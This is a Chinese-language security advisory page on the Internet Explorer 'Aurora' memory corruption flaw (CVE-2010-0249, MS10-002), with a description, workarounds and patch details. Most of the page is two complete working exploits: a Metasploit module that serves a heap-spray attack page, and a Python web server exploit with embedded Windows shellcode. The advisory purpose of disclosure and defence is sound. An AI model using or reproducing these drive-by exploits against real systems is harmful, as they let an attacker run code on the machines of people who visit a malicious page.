安全研究

安全漏洞
Microsoft IE非法事件操作内存破坏漏洞(MS10-002)

发布日期:2010-01-14
更新日期:2010-01-21

受影响系统:
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ  ID: 37815
CVE ID: CVE-2010-0249

Microsoft IE是微软Windows操作系统自带的浏览器软件。

IE在处理非法的事件操作时存在内存破坏漏洞,由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可能导致指针指向被释放后重使用的内存,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页非法操作内存在用户系统上执行指令。

此漏洞是一个0day漏洞,证实影响IE 6/7/8版本,已被利用来攻击一些大型公司的网络,随着技术细节和可用攻击代码的公开极有可能被利用来执行挂马攻击。目前微软已经发布了相关的安全公告,提供了临时解决方案,但还没有提供补丁,强烈建议按照临时解决方案中的建议采取措施。

<*来源:Microsoft
  
  链接:http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx
        http://secunia.com/advisories/38209/
        http://www.kb.cert.org/vuls/id/492515
        http://extraexploit.blogspot.com/2010/01/iexplorer-0day-cve-2010-0249.html
        http://blogs.technet.com/msrc/archive/2010/01/17/further-insight-into-security-advisory-979352-and-the-threat-landscape.aspx
        http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA10-021A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# $Id: ie_aurora.rb 8140 2010-01-16 01:00:01Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "6.0",
        :ua_maxver  => "8.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :vuln_test  => nil, # no way to test without just trying it
    })


    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
            'Description'    => %q{
                This module exploits a memory corruption flaw in Internet Explorer. This
            flaw was found in the wild and was a key component of the "Operation Aurora"
            attacks that lead to the compromise of a number of high profile companies. The
            exploit code is a direct port of the public sample published to the Wepawet
            malware analysis site. The technique used by this module is currently identical
            to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'unknown',
                    'hdm'      # Metasploit port
                ],
            'Version'        => '$Revision: 8140 $',
            'References'     =>
                [
                    ['CVE', '2010-0249'],
                    ['OSVDB', '61697'],
                    ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                    ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 1000,
                    'BadChars' => "\x00",
                    'Compat'   =>
                        {
                            'ConnectionType' => '-find',
                        },
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { }],
                ],
            'DisclosureDate' => 'Jan 14 2009', # wepawet sample
            'DefaultTarget'  => 0))
    end

    def on_request_uri(cli, request)

        if (request.uri.match(/\.gif/i))
            data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
            send_response(cli, data, { 'Content-Type' => 'image/gif' })
            return
        end

        var_memory    = rand_text_alpha(rand(100) + 1)
        var_boom      = rand_text_alpha(rand(100) + 1)
        var_x1        = rand_text_alpha(rand(100) + 1)
        var_e1        = rand_text_alpha(rand(100) + 1)
        var_e2        = rand_text_alpha(rand(100) + 1)

        var_comment   = rand_text_alpha(rand(100) + 1);
        var_abc       = rand_text_alpha(3);

        var_ev1       = rand_text_alpha(rand(100) + 1)
        var_ev2       = rand_text_alpha(rand(100) + 1)
        var_sp1       = rand_text_alpha(rand(100) + 1)

        var_unescape  = rand_text_alpha(rand(100) + 1)
        var_shellcode = rand_text_alpha(rand(100) + 1)
        var_spray     = rand_text_alpha(rand(100) + 1)
        var_start     = rand_text_alpha(rand(100) + 1)
        var_i         = rand_text_alpha(rand(100) + 1)

        rand_html     = rand_text_english(rand(400) + 500)

        html = %Q|<html>
<head>
<script>

    var #{var_comment} = "COMMENT";

    var #{var_x1} = new Array();
    for (i = 0; i < 200; i ++ ){
       #{var_x1}[i] = document.createElement(#{var_comment});
       #{var_x1}[i].data = "#{var_abc}";
    };

    var #{var_e1} = null;

    var #{var_memory} = new Array();
    var #{var_unescape} = unescape;

    function #{var_boom}() {

        var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

        var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

        do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

        for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
    }

    function #{var_ev1}(evt){
        #{var_boom}();
        #{var_e1} = document.createEventObject(evt);
        document.getElementById("#{var_sp1}").innerHTML = "";
        window.setInterval(#{var_ev2}, 50);
    }

    function #{var_ev2}(){
      p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d
      \\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d
      \\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
      for (i = 0; i < #{var_x1}.length; i ++ ){
          #{var_x1}[i].data = p;
      }

      var t = #{var_e1}.srcElement;
    }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

</body>
</html>
        |

        print_status("Sending #{self.name} to client #{cli.peerhost}")
        # Transmit the compressed response to the client
        send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

        # Handle the payload
        handler(cli)
    end
end

http://www.exploit-db.com/exploits/11167

# Title: Internet Explorer Aurora Exploit
# EDB-ID: 11167
# CVE-ID: (CVE-2010-0249)
# OSVDB-ID: ()
# Author: Ahmed Obied
# Published: 2010-01-17
# Verified: yes
# Download Exploit Code
# Download N/A
#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   This program acts as a web server that generates an exploit to
#   target a vulnerability (CVE-2010-0249) in Internet Explorer.
#   The exploit was tested using Internet Explorer 6 on Windows XP SP2.
#   The exploit's payload spawns the calculator.
#
#   Usage  : python ie_aurora.py [port number]
#  
  
import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):

    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
                
    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
        payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
        payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
        payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
        payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
        payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
        payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
        payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
        payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
        payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
        payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)
    
    def get_exploit(self):
        exploit = '''
        <html>
        <head>
            <script>
            
            var obj, event_obj;
            
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
            
                chunk_size = 0x80000;
                payload = unescape("<PAYLOAD>");
                nopsled = unescape("<NOP>");
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (payload.length + 20);      
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks[i] = nopsled + payload;
            }
        
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj[i] = document.createElement("COMMENT");
            }
        
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
      
            function ev2()
            {
                var data, tmp;
                
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj[i].data = data;
                }
                event_obj.srcElement;
            }
                    
            function check()
            {
                if (navigator.userAgent.indexOf("MSIE") == -1)
                    return false;
                return true;  
            }
            
            if (check()) {
                initialize();
                spray_heap();              
            }
            else
                window.location = 'about:blank'
                
            </script>
        </head>
        <body>
            <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
            </span>      
        </body>
        </html>
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
        return exploit

    def get_image(self):
        content  = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        content += '\x01\x00\x3b'
        return content

    def log_request(self, *args, **kwargs):
        pass
        
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
            elif self.path == '/aurora.gif':    
                self.send_response(200)
                self.send_header('Content-Type', 'image/gif')
                self.end_headers()
                self.wfile.write(self.get_image())
        except:
            print '[*] Error : an error has occured while serving the HTTP request'
            print '[-] Exiting ...'
            sys.exit(-1)
            
                        
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 1024 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                print '[-] Exiting ...'
        except socket.error:
            print '[*] Error : a socket error has occurred'
        sys.exit(-1)  
    except ValueError:
        print '[*] Error : an invalid port number was given'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()

建议:
临时解决方法:

* 对Internet Explorer 6 SP2或Internet Explorer 7启用DEP。

  微软提供了一个自动化的工具为IE 6/7开启DEP,请到如下网址下载:
  http://go.microsoft.com/?linkid=9668626

* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS10-002)以及相应补丁:
MS10-002:Cumulative Security Update for Internet Explorer (978207)
链接:http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true

浏览次数:24160
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障